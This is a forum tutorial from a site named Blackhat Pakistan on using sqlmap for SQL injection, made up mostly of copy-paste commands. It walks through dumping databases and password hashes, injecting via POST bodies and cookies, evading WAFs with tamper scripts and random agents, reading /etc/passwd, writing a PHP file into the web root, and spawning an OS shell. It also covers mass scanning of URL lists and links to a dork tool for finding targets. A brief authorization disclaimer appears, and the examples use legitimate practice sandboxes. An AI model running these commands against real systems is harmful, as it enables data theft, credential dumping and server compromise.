• Blackhat Pakistan — Ethical Hacking, Hacking Tools & Cybersecurity Tutorials

SQLMap Tutorial for Beginners 2026 - Automate SQL Injection Testing

Blackhatpakistan

Administrator
Staff member
Joined
Dec 30, 2024
Messages
388
Reaction score
206
Points
62
Website
blackhatpakistan.net
Points
1,068
USD
1,068
SQLMap is the open-source automation tool that detects, exploits, and extracts data through SQL injection vulnerabilities - you point it at a URL parameter and it fingerprints the database backend, enumerates schemas, dumps tables, and optionally drops to an OS shell, all without you writing a single payload by hand. This SQLMap tutorial covers the full 2026 workflow: install on Kali Linux, first detection run, table and database dumping, POST and cookie injection, WAF bypass with tamper scripts, and the exact flags that separate a noisy run from a clean one.

TL;DR - SQLMap turns manual SQL injection into a command-line workflow: detect first (--batch --dbs), enumerate second (-D db --tables), extract last (-T table --dump). Error-based is fastest, time-based is slowest - pick with --technique=BEUSTQ. WAF in the way? --tamper=space2comment,between plus --delay=1 and --random-agent. Always test only systems you own or have written permission to assess. Full command reference, flag tables, and the speed/noise profile are below - the cheatsheet at the end is copy-paste ready.

WHAT SQLMAP ACTUALLY DOES

SQL injection happens when user input is concatenated into a database query instead of being parameterized - the attacker's input becomes part of the query's grammar. SQLMap automates the entire exploitation chain in phases:

- Detects the injection class: boolean-based blind, time-based blind, error-based, UNION query, stacked queries, inline queries
- Fingerprints the DBMS: MySQL, PostgreSQL, Microsoft SQL Server, Oracle, SQLite, IBM DB2, SAP MaxDB
- Enumerates: server version, current user, current database, privileges, databases, tables, columns
- Extracts: row data, password hashes, files (LOAD_FILE / INTO OUTFILE), OS shell where the backend permits

A detection run against an error-based vulnerability finishes in 10-30 requests. A time-based blind enumeration can run thousands of requests over minutes - that difference is the whole speed story in this tutorial.

INSTALL ON KALI LINUX

Kali ships sqlmap in the default repositories:

Code:
sudo apt update && sudo apt install sqlmap
sqlmap --version

Any distro with Python 3:

Code:
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python3 sqlmap.py --version

Update before every engagement - payload libraries and WAF bypasses change weekly:

Code:
git pull

STEP 1 - FIRST DETECTION RUN

The safest starting point: detection only, no extraction, auto-answers on:

Code:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --batch --dbs

- -u sets the target URL - the injectable parameter must be inside it
- --batch answers every prompt with its default, so the run never stalls
- --dbs asks for database names the moment injection is confirmed

Expected output on a vulnerable target:

Code:
available databases [5]:
[*] acuart
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

If sqlmap returns "not injectable", the parameter is either filtered or the connection is unstable - retry with --level=3 --risk=2 before declaring it clean.

STEP 2 - ENUMERATE TABLES AND COLUMNS

Code:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables

Code:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns

Every finished run is cached in ~/.local/share/sqlmap/sessions/ - resume instead of repeating with --resume. This one flag saves hours on slow time-based targets.

STEP 3 - DUMP DATA

Code:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --dump

SQLMap detects hash formats in-column and offers to crack them in-band, dictionary first. To test login forms directly:

Code:
sqlmap -u "http://testphp.vulnweb.com/login.php" --forms --crawl=2

--forms grabs every form on the page, --crawl=2 follows links two levels deep and tests each parameter it finds - that combination is the bug-bounty starter command.

STEP 4 - POST, COOKIES, AND AUTHENTICATED SESSIONS

Real targets hide injection behind login walls and in POST bodies.

POST parameters:

Code:
sqlmap -u "http://target.com/login.php" --data="user=admin&pass=test" -p user --batch

Session cookies:

Code:
sqlmap -u "http://target.com/page.php" --cookie="PHPSESSID=abc123; security=low" -p id

Header injection (X-Forwarded-For, User-Agent, Referer):

Code:
sqlmap -u "http://target.com/" --headers="X-Forwarded-For: 12.34.56.78" -p id

Authenticated testing: log in through Burp Suite or your browser first, export the cookie, hand it to sqlmap with --cookie - now you are testing behind the login wall, where the interesting bugs live.

STEP 5 - PICK THE TECHNIQUE

By default sqlmap tries everything - wasteful on slow targets. Narrow it:

Code:
sqlmap -u "URL" --technique=BEUSTQ

Code:
Letter  Technique              Speed
------  ---------------------  -------------------
B       Boolean-based blind    Slow (many requests)
E       Error-based            Fast (single response)
U       UNION query            Fast
S       Stacked queries        Depends on backend
T       Time-based blind       Slowest (sleep delays)
Q       Inline queries         Rare

Error-based first whenever it works - seconds instead of hundreds of blind probes. Time-based only as the fallback; set --timeout=30 --retries=3 so flaky connections do not kill the run.

STEP 6 - WAF BYPASS WITH TAMPER SCRIPTS

A WAF stripping your payloads? Chain tamper scripts that rewrite syntax:

Code:
sqlmap -u "URL" --tamper=space2comment,between,randomcase --dbs

The useful ones:

- space2comment - spaces become /**/
- between - comparison operators become BETWEEN
- randomcase - randomizes keyword casing (defeats case-sensitive filters)
- charencode - URL-encodes the payload
- base64encode - for double-encoded sinks

Full WAF profile:

Code:
sqlmap -u "URL" --tamper=space2comment --delay=1 --risk=2 --level=3 --random-agent

--level (1-5) expands which injection points are tested (headers, User-Agent, Referer at higher levels). --risk (1-3) adds riskier payload families - risk 3 can modify data on stacked-query targets, so use it on test environments first.

STEP 7 - POWER FLAGS AFTER YOU ARE IN

Code:
--os-shell                 interactive OS shell (PHP/ASPX + writable dir)
--file-read="/etc/passwd"   read files through the backend
--file-write="a.php" --file-dest="/var/www/html/a.php"
--priv-escal                check MSSQL/sysadmin escalation paths
--passwords                 hash dump across all accounts
--current-user --current-db --is-dba

--os-shell needs a PHP or ASPX page writing to a web-reachable directory - without it you fall back to file read/write primitives only.

STEP 8 - BATCH AGAINST A LIST

Code:
sqlmap -m urls.txt --batch --dbs --threads=5

urls.txt is one URL per line. Keep threads at 5 - above that, targets time out mid-run and the results file fills with connection errors instead of findings.

SPEED AND NOISE PROFILE

Code:
Error-based detection     10-30 requests, under 10 seconds
UNION extraction          30-100 requests, seconds
Boolean blind enumeration 500-2000 requests, minutes
Time-based full dump      thousands of requests, hours
Best logging flag         --output-dir=/root/engagements/client1

Noise matters for bug bounty: run --delay=1 with --random-agent on shared hosting, split long lists across sessions, and always log per-client with --output-dir so reports stay organized.

QUICK REFERENCE - COPY PASTE

Code:
# detect only, no extraction
sqlmap -u "URL" --batch --smart

# full chain: POST + cookie + dump
sqlmap -u "URL" --data="id=1" --cookie="SESSION=x" \
  -D dbname -T table --dump --batch

# crawl a site and test every parameter
sqlmap -u "http://target.com" --crawl=3 --batch --dbs

# WAF bypass profile
sqlmap -u "URL" --tamper=space2comment,between \
  --level=3 --risk=2 --random-agent

# bug bounty one-liner
sqlmap -u "URL" --batch --forms --crawl=2 --level=3 \
  --risk=2 --technique=BEU --dbs --threads=4

FAQ

Q: Is sqlmap legal?
A: On systems you own or hold written authorization to test, yes - it is a standard penetration testing tool shipped in every major security distribution. Authorization is the entire line.

Q: Why does sqlmap say "not injectable" when the parameter looks vulnerable?
A: Usually wrong technique selection or a WAF silently stripping payloads. Retry with --level=3 --risk=2 --tamper=space2comment --random-agent before moving on.

Q: sqlmap versus manual testing in Burp?
A: sqlmap finds and exploits what its payload library covers. Logic-level issues - second-order injection, JSON nesting, custom encodings, stateful flows - still require a human driving Burp Repeater.

Q: What is the fastest way to learn sqlmap?
A: Run it against the testphp.vulnweb.com sandbox and the Damn Vulnerable Web App (DVWA) in SQL injection mode - both are legal targets built for exactly this practice.

Q: How do sites defend against sqlmap?
A: Parameterized queries (prepared statements) everywhere, least-privilege database accounts, input normalization before matching in the WAF, and rate limiting that throttles the request bursts sqlmap depends on.

RELATED ON BLACKHAT PAKISTAN

WiFi Password Hack 2026 - Complete Guide - the wireless side of the same testing skillset.
Advanced Web Hacking Tools - the wider toolkit sqlmap sits inside.
SQLi Dumper v10.6 - the GUI route to the same dumps when you want speed over control.
Simple Dork Generator - find injectable parameters at scale with search dorks before you ever run sqlmap.

Code:
--batch            non-interactive, auto-default answers
--smart            only test params that look injectable
--level=3 --risk=2 wider injection surface, richer payloads
--technique=BEU    error + boolean + union only (fast)
--threads=5        safe parallelism for URL lists
--random-agent     rotate User-Agent per request
--delay=1          throttle for fragile WAFs
--retries=3        survive flaky connections
--timeout=30       per-request timeout
--resume           continue a saved session
--output-dir=DIR   per-engagement result isolation
 
Threads
1,073Threads
Messages
2,132Messages
Members
3,704Members
Latest member
AlaricalaraLatest member
Top